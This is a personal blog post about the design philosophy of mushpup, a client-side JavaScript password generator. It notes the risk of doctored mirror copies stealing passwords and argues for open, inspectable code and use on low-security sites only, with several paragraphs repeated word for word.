the mushpup open philosophy
One of the ideas central to mushpup and that distinguishes it from something like roboform or eWallet is its (free) decentralized model. It doesn't store anything and it isn't limited to your desktop computer. And thanks to the google subversion repository and javascript and browsers, it can easily be installed anywhere.
This is its beauty and also its vulnerability. If mushpup forms were to proliferate, as they now easily could, someone could maliciously put a doctored mushpup form up on their website, offer it as a mirror, and start stealing plaintext passwords. There would be ways I can imagine to programmatically address this risk. But it would be complicated (something also contrary to the mushpup keep-it-simple philosophy) and would inevitably be defeated.
The best solution, and perhaps the only one, is sunlight. Everything is and always should be open to inspection. The code is javascript meaning that it runs on the client -- that is, on a browser in your machine, not a server, where your data could be stored in a database or logged. That also means that you should be able to inspect the code you're running by viewing the source. And because the code is available at its googlecode repository, you'll always have a reference for comparison.
Just as important, we stress the fact that mushpup is designed specifically for low security site. Don't use it for your banking site (this is a situation for which something like roboform or passwordmaker might be better suited.) The neat thing is: by using mushpup on your low security sites, there's a good chance your making your visits to high security sites more secure by not using the same password there.
I've added a list of mushpup mirrors to the right here. These are the sites to which I've added the mushpup form myself. If you're not sure you trust me, feel free to inspect the code, grab it, and add it to your own site. Also keep in my that mushpup is designed to allow anyone -- even the bad guys -- to do that. Your best security is awareness. And that is what mushpup ultimately promotes.
This is its beauty and also its vulnerability. If mushpup forms were to proliferate, as they now easily could, someone could maliciously put a doctored mushpup form up on their website, offer it as a mirror, and start stealing plaintext passwords. There would be ways I can imagine to programmatically address this risk. But it would be complicated (something also contrary to the mushpup keep-it-simple philosophy) and would inevitably be defeated.
The best solution, and perhaps the only one, is sunlight. Everything is and always should be open to inspection. The code is javascript meaning that it runs on the client -- that is, on a browser in your machine, not a server, where your data could be stored in a database or logged. That also means that you should be able to inspect the code you're running by viewing the source. And because the code is available at its googlecode repository, you'll always have a reference for comparison.
Just as important, we stress the fact that mushpup is designed specifically for low security site. Don't use it for your banking site (this is a situation for which something like roboform or passwordmaker might be better suited.) The neat thing is: by using mushpup on your low security sites, there's a good chance your making your visits to high security sites more secure by not using the same password there.
I've added a list of mushpup mirrors to the right here. These are the sites to which I've added the mushpup form myself. If you're not sure you trust me, feel free to inspect the code, grab it, and add it to your own site. Also keep in my that mushpup is designed to allow anyone -- even the bad guys -- to do that. Your best security is awareness. And that is what mushpup ultimately promotes.
posted by klenwell at 11:47 AM
0 Comments:
Post a Comment
<< Home